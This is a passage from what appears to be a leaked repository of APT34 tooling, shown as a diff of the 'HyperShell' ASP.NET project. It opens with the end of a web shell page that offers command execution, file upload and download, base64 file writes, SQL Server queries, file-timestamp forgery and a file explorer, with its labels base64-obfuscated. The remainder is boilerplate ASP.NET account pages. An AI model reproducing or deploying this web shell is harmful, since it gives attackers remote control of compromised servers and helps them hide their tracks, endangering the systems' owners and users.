<t><%=x("Q29tbWFuZA==")%> :</t>
<input name="cmd" class="mmm" type="text" value='<%= cmd %>' />
<input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post" enctype="multipart/form-data">
<table>
<tr>
<td class="h"><%=x("VXBsb2Fk")%></td>
<td class="b">
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="upl" type="file" /><br>
<t><%=x("U2F2ZSBhcw==")%> :</t>
<input name="sav" class="mmm" type="text" value='<%= sav %>' />
<input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
<t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
<input name="nen" class="mmm" type="text" value='<%= nen %>' />
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("RG93bmxvYWQ=")%></td>
<td class="b">
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="don" type="text" />
<input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('don')[0].value = btoa(document.getElementsByName('don')[0].value);" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
<td class="b">
<t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
<textarea name="baseFile"></textarea>
<input name="baseVir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
<t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
<input name="baseAddr" class="mmm" type="text" value='<%= baseAddr %>' />
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("U3FsIFNlcnZlcg==")%></td>
<td class="b">
<input style="margin:0 0 3px 192px" type="button" value="<%=x("U3RhbmRhcmQgQ29ubmVjdGlvbiBTYW1wbGU=")%>" onclick="document.getElementsByName('sqc')[0].value = '<%=x("U2VydmVyPS47RGF0YWJhc2U9ZGI7VXNlciBJZD11c2VyO1Bhc3N3b3JkPXBhc3M=")%> '" />
<input style="margin:0 0 3px 0" type="button" value="<%=x("VHJ1c3RlZCBDb25uZWN0aW4gU2FtcGxl")%>" onclick="document.getElementsByName('sqc')[0].value = '<%=x("U2VydmVyPS47RGF0YWJhc2U9ZGI7VHJ1c3RlZF9Db25uZWN0aW9uPVRydWU=")%> '" /><br />
<t><%=x("Q29ubmVjdGlvbiBTdHJpbmc=")%> :</t>
<input name="sqc" class="mmm" type="text" value='<%= sqc %>' /><br />
<t><%=x("UXVlcnk=")%> :</t>
<textarea name="sqq" class="mmm"><%= sqq %></textarea>
<input type="submit" value="<%= x("UnVu") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("Q2hhbmdlIENyZWF0aW9uIFRpbWU=")%></td>
<td class="b">
<input name="hid" type="hidden" />
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="tfil" class="mmm" type="text" value='<%= tfil %>' />
<input type="submit" value="<%= x("R2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '1'" /><br>
<t><%=x("RnJvbSBUaGlzIEZpbGU=")%> :</t>
<input name="ttar" class="mmm" type="text" value='<%= ttar %>' />
<input type="submit" value="<%= x("U2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '2'" /><br>
<t><%=x("TmV3IFRpbWU=")%> :</t>
<input name="ttim" class="mmm" type="text" value='<%= ttim %>' />
<input type="submit" value="<%= x("U2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '3'" />
</td>
</tr>
</table>
</form>
<hr />
<br />
<pre id="log" runat="server"></pre>
<script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
</div>
<div id="tbDir" class="tb">
<table>
<tr>
<td class="h">Explorer</td>
<td class="b">
<t>Address :</t>
<input name="exadd" class="mmm" type="text" value='<%= exadd %>' onkeypress="return checkEnter(event);" />
<input type="submit" value="Explore" onclick="sendAddress();" style="margin-right:5px;" />
<span id="loader" class="loader" style="display:none"></span>
</td>
</tr>
</table>
<hr />
<div id="objLocation">
<div class="objS">Location :</div><div class="objD objL" onclick="setAddress(this.innerText);">root</div>
</div>
<div id="objFrame">
</div>
</div>
</body>
</html>

7
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/About.aspx Normal file
View File

@@ -0,0 +1,7 @@
<%@ Page Title="About" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="About.aspx.cs" Inherits="HyperShell.About" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<h3>Your application description page.</h3>
<p>Use this area to provide additional information.</p>
</asp:Content>

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/About.aspx.cs Normal file
View File

@@ -0,0 +1,17 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell
{
public partial class About : Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/About.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,17 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell
{
public partial class About
{
}
}

28
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/AddPhoneNumber.aspx Normal file
View File

@@ -0,0 +1,28 @@
<%@ Page Title="Phone Number" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="AddPhoneNumber.aspx.cs" Inherits="HyperShell.Account.AddPhoneNumber" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<div class="form-horizontal">
<h4>Add a phone number</h4>
<hr />
<asp:ValidationSummary runat="server" CssClass="text-danger" />
<p class="text-danger">
<asp:Literal runat="server" ID="ErrorMessage" />
</p>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="PhoneNumber" CssClass="col-md-2 control-label">Phone Number</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="PhoneNumber" CssClass="form-control" TextMode="Phone" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="PhoneNumber"
CssClass="text-danger" ErrorMessage="The PhoneNumber field is required." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="PhoneNumber_Click"
Text="Submit" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:Content>

34
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/AddPhoneNumber.aspx.cs Normal file
View File

@@ -0,0 +1,34 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using System.Threading.Tasks;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class AddPhoneNumber : System.Web.UI.Page
{
protected void PhoneNumber_Click(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var code = manager.GenerateChangePhoneNumberToken(User.Identity.GetUserId(), PhoneNumber.Text);
if (manager.SmsService != null)
{
var message = new IdentityMessage
{
Destination = PhoneNumber.Text,
Body = "Your security code is " + code
};
manager.SmsService.Send(message);
}
Response.Redirect("/Account/VerifyPhoneNumber?PhoneNumber=" + HttpUtility.UrlEncode(PhoneNumber.Text));
}
}
}

33
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/AddPhoneNumber.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,33 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class AddPhoneNumber {
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal ErrorMessage;
/// <summary>
/// PhoneNumber control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox PhoneNumber;
}
}

18
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Confirm.aspx Normal file
View File

@@ -0,0 +1,18 @@
<%@ Page Title="Account Confirmation" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Confirm.aspx.cs" Inherits="HyperShell.Account.Confirm" Async="true" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<div>
<asp:PlaceHolder runat="server" ID="successPanel" ViewStateMode="Disabled" Visible="true">
<p>
Thank you for confirming your account. Click <asp:HyperLink ID="login" runat="server" NavigateUrl="~/Account/Login">here</asp:HyperLink> to login
</p>
</asp:PlaceHolder>
<asp:PlaceHolder runat="server" ID="errorPanel" ViewStateMode="Disabled" Visible="false">
<p class="text-danger">
An error has occurred.
</p>
</asp:PlaceHolder>
</div>
</asp:Content>

37
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Confirm.aspx.cs Normal file
View File

@@ -0,0 +1,37 @@
using System;
using System.Web;
using System.Web.UI;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class Confirm : Page
{
protected string StatusMessage
{
get;
private set;
}
protected void Page_Load(object sender, EventArgs e)
{
string code = IdentityHelper.GetCodeFromRequest(Request);
string userId = IdentityHelper.GetUserIdFromRequest(Request);
if (code != null && userId != null)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var result = manager.ConfirmEmail(userId, code);
if (result.Succeeded)
{
successPanel.Visible = true;
return;
}
}
successPanel.Visible = false;
errorPanel.Visible = true;
}
}
}

43
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Confirm.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,43 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class Confirm {
/// <summary>
/// successPanel control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder successPanel;
/// <summary>
/// login control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HyperLink login;
/// <summary>
/// errorPanel control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder errorPanel;
}
}

39
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Forgot.aspx Normal file
View File

@@ -0,0 +1,39 @@
<%@ Page Title="Forgot password" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Forgot.aspx.cs" Inherits="HyperShell.Account.ForgotPassword" Async="true" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<div class="row">
<div class="col-md-8">
<asp:PlaceHolder id="loginForm" runat="server">
<div class="form-horizontal">
<h4>Forgot your password?</h4>
<hr />
<asp:PlaceHolder runat="server" ID="ErrorMessage" Visible="false">
<p class="text-danger">
<asp:Literal runat="server" ID="FailureText" />
</p>
</asp:PlaceHolder>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Email" CssClass="col-md-2 control-label">Email</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Email" CssClass="form-control" TextMode="Email" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Email"
CssClass="text-danger" ErrorMessage="The email field is required." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="Forgot" Text="Email Link" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:PlaceHolder>
<asp:PlaceHolder runat="server" ID="DisplayEmail" Visible="false">
<p class="text-info">
Please check your email to reset your password.
</p>
</asp:PlaceHolder>
</div>
</div>
</asp:Content>

40
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Forgot.aspx.cs Normal file
View File

@@ -0,0 +1,40 @@
using System;
using System.Web;
using System.Web.UI;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class ForgotPassword : Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void Forgot(object sender, EventArgs e)
{
if (IsValid)
{
// Validate the user's email address
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
ApplicationUser user = manager.FindByName(Email.Text);
if (user == null || !manager.IsEmailConfirmed(user.Id))
{
FailureText.Text = "The user either does not exist or is not confirmed.";
ErrorMessage.Visible = true;
return;
}
// For more information on how to enable account confirmation and password reset please visit http://go.microsoft.com/fwlink/?LinkID=320771
// Send email with the code and the redirect to reset password page
//string code = manager.GeneratePasswordResetToken(user.Id);
//string callbackUrl = IdentityHelper.GetResetPasswordRedirectUrl(code, Request);
//manager.SendEmail(user.Id, "Reset Password", "Please reset your password by clicking <a href=\"" + callbackUrl + "\">here</a>.");
loginForm.Visible = false;
DisplayEmail.Visible = true;
}
}
}
}

60
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Forgot.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,60 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class ForgotPassword {
/// <summary>
/// loginForm control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder loginForm;
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder ErrorMessage;
/// <summary>
/// FailureText control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal FailureText;
/// <summary>
/// Email control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Email;
/// <summary>
/// DisplayEmail control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder DisplayEmail;
}
}

8
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Lockout.aspx Normal file
View File

@@ -0,0 +1,8 @@
<%@ Page Title="" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Lockout.aspx.cs" Inherits="HyperShell.Account.Lockout" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<hgroup>
<h1>Locked out.</h1>
<h2 class="text-danger">This account has been locked out, please try again later.</h2>
</hgroup>
</asp:Content>

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Lockout.aspx.cs Normal file
View File

@@ -0,0 +1,17 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell.Account
{
public partial class Lockout : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Lockout.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,17 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account
{
public partial class Lockout
{
}
}

65
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Login.aspx Normal file
View File

@@ -0,0 +1,65 @@
<%@ Page Title="Log in" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Login.aspx.cs" Inherits="HyperShell.Account.Login" Async="true" %>
<%@ Register Src="~/Account/OpenAuthProviders.ascx" TagPrefix="uc" TagName="OpenAuthProviders" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<div class="row">
<div class="col-md-8">
<section id="loginForm">
<div class="form-horizontal">
<h4>Use a local account to log in.</h4>
<hr />
<asp:PlaceHolder runat="server" ID="ErrorMessage" Visible="false">
<p class="text-danger">
<asp:Literal runat="server" ID="FailureText" />
</p>
</asp:PlaceHolder>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Email" CssClass="col-md-2 control-label">Email</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Email" CssClass="form-control" TextMode="Email" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Email"
CssClass="text-danger" ErrorMessage="The email field is required." />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Password" CssClass="col-md-2 control-label">Password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Password" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Password" CssClass="text-danger" ErrorMessage="The password field is required." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<div class="checkbox">
<asp:CheckBox runat="server" ID="RememberMe" />
<asp:Label runat="server" AssociatedControlID="RememberMe">Remember me?</asp:Label>
</div>
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="LogIn" Text="Log in" CssClass="btn btn-default" />
</div>
</div>
</div>
<p>
<asp:HyperLink runat="server" ID="RegisterHyperLink" ViewStateMode="Disabled">Register as a new user</asp:HyperLink>
</p>
<p>
<%-- Enable this once you have account confirmation enabled for password reset functionality
<asp:HyperLink runat="server" ID="ForgotPasswordHyperLink" ViewStateMode="Disabled">Forgot your password?</asp:HyperLink>
--%>
</p>
</section>
</div>
<div class="col-md-4">
<section id="socialLoginForm">
<uc:OpenAuthProviders runat="server" ID="OpenAuthLogin" />
</section>
</div>
</div>
</asp:Content>

61
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Login.aspx.cs Normal file
View File

@@ -0,0 +1,61 @@
using System;
using System.Web;
using System.Web.UI;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class Login : Page
{
protected void Page_Load(object sender, EventArgs e)
{
RegisterHyperLink.NavigateUrl = "Register";
// Enable this once you have account confirmation enabled for password reset functionality
//ForgotPasswordHyperLink.NavigateUrl = "Forgot";
OpenAuthLogin.ReturnUrl = Request.QueryString["ReturnUrl"];
var returnUrl = HttpUtility.UrlEncode(Request.QueryString["ReturnUrl"]);
if (!String.IsNullOrEmpty(returnUrl))
{
RegisterHyperLink.NavigateUrl += "?ReturnUrl=" + returnUrl;
}
}
protected void LogIn(object sender, EventArgs e)
{
if (IsValid)
{
// Validate the user password
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signinManager = Context.GetOwinContext().GetUserManager<ApplicationSignInManager>();
// This doen't count login failures towards account lockout
// To enable password failures to trigger lockout, change to shouldLockout: true
var result = signinManager.PasswordSignIn(Email.Text, Password.Text, RememberMe.Checked, shouldLockout: false);
switch (result)
{
case SignInStatus.Success:
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
break;
case SignInStatus.LockedOut:
Response.Redirect("/Account/Lockout");
break;
case SignInStatus.RequiresVerification:
Response.Redirect(String.Format("/Account/TwoFactorAuthenticationSignIn?ReturnUrl={0}&RememberMe={1}",
Request.QueryString["ReturnUrl"],
RememberMe.Checked),
true);
break;
case SignInStatus.Failure:
default:
FailureText.Text = "Invalid login attempt";
ErrorMessage.Visible = true;
break;
}
}
}
}
}

78
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Login.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,78 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class Login {
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder ErrorMessage;
/// <summary>
/// FailureText control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal FailureText;
/// <summary>
/// Email control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Email;
/// <summary>
/// Password control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Password;
/// <summary>
/// RememberMe control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.CheckBox RememberMe;
/// <summary>
/// RegisterHyperLink control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HyperLink RegisterHyperLink;
/// <summary>
/// OpenAuthLogin control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::HyperShell.Account.OpenAuthProviders OpenAuthLogin;
}
}

80
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Manage.aspx Normal file
View File

@@ -0,0 +1,80 @@
<%@ Page Title="Manage Account" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Manage.aspx.cs" Inherits="HyperShell.Account.Manage" %>
<%@ Register Src="~/Account/OpenAuthProviders.ascx" TagPrefix="uc" TagName="OpenAuthProviders" %>
<asp:Content ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<div>
<asp:PlaceHolder runat="server" ID="successMessage" Visible="false" ViewStateMode="Disabled">
<p class="text-success"><%: SuccessMessage %></p>
</asp:PlaceHolder>
</div>
<div class="row">
<div class="col-md-12">
<div class="form-horizontal">
<h4>Change your account settings</h4>
<hr />
<dl class="dl-horizontal">
<dt>Password:</dt>
<dd>
<asp:HyperLink NavigateUrl="/Account/ManagePassword" Text="[Change]" Visible="false" ID="ChangePassword" runat="server" />
<asp:HyperLink NavigateUrl="/Account/ManagePassword" Text="[Create]" Visible="false" ID="CreatePassword" runat="server" />
</dd>
<dt>External Logins:</dt>
<dd><%: LoginsCount %>
<asp:HyperLink NavigateUrl="/Account/ManageLogins" Text="[Manage]" runat="server" />
</dd>
<%--
Phone Numbers can used as a second factor of verification in a two-factor authentication system.
See <a href="http://go.microsoft.com/fwlink/?LinkId=403804">this article</a>
for details on setting up this ASP.NET application to support two-factor authentication using SMS.
Uncomment the following blocks after you have set up two-factor authentication
--%>
<%--
<dt>Phone Number:</dt>
<% if (HasPhoneNumber)
{ %>
<dd>
<asp:HyperLink NavigateUrl="/Account/AddPhoneNumber" runat="server" Text="[Add]" />
</dd>
<% }
else
{ %>
<dd>
<asp:Label Text="" ID="PhoneNumber" runat="server" />
<asp:HyperLink NavigateUrl="/Account/AddPhoneNumber" runat="server" Text="[Change]" /> &nbsp;|&nbsp;
<asp:LinkButton Text="[Remove]" OnClick="RemovePhone_Click" runat="server" />
</dd>
<% } %>
--%>
<dt>Two-Factor Authentication:</dt>
<dd>
<p>
There are no two-factor authentication providers configured. See <a href="http://go.microsoft.com/fwlink/?LinkId=403804">this article</a>
for details on setting up this ASP.NET application to support two-factor authentication.
</p>
<% if (TwoFactorEnabled)
{ %>
<%--
Enabled
<asp:LinkButton Text="[Disable]" runat="server" CommandArgument="false" OnClick="TwoFactorDisable_Click" />
--%>
<% }
else
{ %>
<%--
Disabled
<asp:LinkButton Text="[Enable]" CommandArgument="true" OnClick="TwoFactorEnable_Click" runat="server" />
--%>
<% } %>
</dd>
</dl>
</div>
</div>
</div>
</asp:Content>

128
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Manage.aspx.cs Normal file
View File

@@ -0,0 +1,128 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Web;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.EntityFramework;
using Microsoft.AspNet.Identity.Owin;
using Microsoft.Owin.Security;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class Manage : System.Web.UI.Page
{
protected string SuccessMessage
{
get;
private set;
}
private bool HasPassword(ApplicationUserManager manager)
{
return manager.HasPassword(User.Identity.GetUserId());
}
public bool HasPhoneNumber { get; private set; }
public bool TwoFactorEnabled { get; private set; }
public bool TwoFactorBrowserRemembered { get; private set; }
public int LoginsCount { get; set; }
protected void Page_Load()
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
HasPhoneNumber = String.IsNullOrEmpty(manager.GetPhoneNumber(User.Identity.GetUserId()));
// Enable this after setting up two-factor authentientication
//PhoneNumber.Text = manager.GetPhoneNumber(User.Identity.GetUserId()) ?? String.Empty;
TwoFactorEnabled = manager.GetTwoFactorEnabled(User.Identity.GetUserId());
LoginsCount = manager.GetLogins(User.Identity.GetUserId()).Count;
var authenticationManager = HttpContext.Current.GetOwinContext().Authentication;
if (!IsPostBack)
{
// Determine the sections to render
if (HasPassword(manager))
{
ChangePassword.Visible = true;
}
else
{
CreatePassword.Visible = true;
ChangePassword.Visible = false;
}
// Render success message
var message = Request.QueryString["m"];
if (message != null)
{
// Strip the query string from action
Form.Action = ResolveUrl("~/Account/Manage");
SuccessMessage =
message == "ChangePwdSuccess" ? "Your password has been changed."
: message == "SetPwdSuccess" ? "Your password has been set."
: message == "RemoveLoginSuccess" ? "The account was removed."
: message == "AddPhoneNumberSuccess" ? "Phone number has been added"
: message == "RemovePhoneNumberSuccess" ? "Phone number was removed"
: String.Empty;
successMessage.Visible = !String.IsNullOrEmpty(SuccessMessage);
}
}
}
private void AddErrors(IdentityResult result)
{
foreach (var error in result.Errors)
{
ModelState.AddModelError("", error);
}
}
// Remove phonenumber from user
protected void RemovePhone_Click(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
var result = manager.SetPhoneNumber(User.Identity.GetUserId(), null);
if (!result.Succeeded)
{
return;
}
var user = manager.FindById(User.Identity.GetUserId());
if (user != null)
{
signInManager.SignIn(user, isPersistent: false, rememberBrowser: false);
Response.Redirect("/Account/Manage?m=RemovePhoneNumberSuccess");
}
}
// DisableTwoFactorAuthentication
protected void TwoFactorDisable_Click(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
manager.SetTwoFactorEnabled(User.Identity.GetUserId(), false);
Response.Redirect("/Account/Manage");
}
//EnableTwoFactorAuthentication
protected void TwoFactorEnable_Click(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
manager.SetTwoFactorEnabled(User.Identity.GetUserId(), true);
Response.Redirect("/Account/Manage");
}
}
}

51
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Manage.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,51 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class Manage {
/// <summary>
/// successMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder successMessage;
/// <summary>
/// ChangePassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HyperLink ChangePassword;
/// <summary>
/// CreatePassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HyperLink CreatePassword;
/// <summary>
/// PhoneNumber control.
/// </summary>
/// <remarks>
/// Auto-generated field.
